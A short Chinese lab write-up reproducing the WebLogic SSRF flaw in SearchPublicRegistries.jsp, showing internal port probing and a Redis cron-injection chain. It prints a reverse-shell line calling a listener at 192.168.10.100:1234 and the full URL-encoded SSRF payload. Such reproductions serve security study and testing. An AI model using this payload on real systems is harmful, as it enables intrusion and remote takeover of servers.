Weblogic-SSRF漏洞复现

Weblogic-SSRF漏洞复现
记一次Weblogic-SSRF漏洞复现过程
0x01SSRF简介
SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞，一般情况下，ssrf攻击的目标是从外网无法访问的内部系统。

0x02环境搭建
Weblogic中存在一个SSRF漏洞，利用该漏洞可以发送任意HTTP请求，进而攻击内网中redis、fastcgi等脆弱组件。
环境如下：
http://192.168.10.131:7001/uddiexplorer/

SSRF漏洞存在于`/uddiexplorer/SearchPublicRegistries.jsp中

0x03漏洞复现过程
当访问存在的IP:PORT时，报错如下：

修改为不存在的端口时，报错如下：

根据报错的不同，可以进行内网探测。
此时通过ssrf探测内网中的redis服务器，发现’172.18.0.2:6379’可以连通

发送三条redis命令，将弹shell脚本写入/etc/crontab：
set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.10.100/1234 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save

进行url编码：（注意，只对特殊符合进行编码）
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.10.100%2F1234%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
将url编码后的字符串放在ssrf的域名后面，发送：

成功反弹shell

end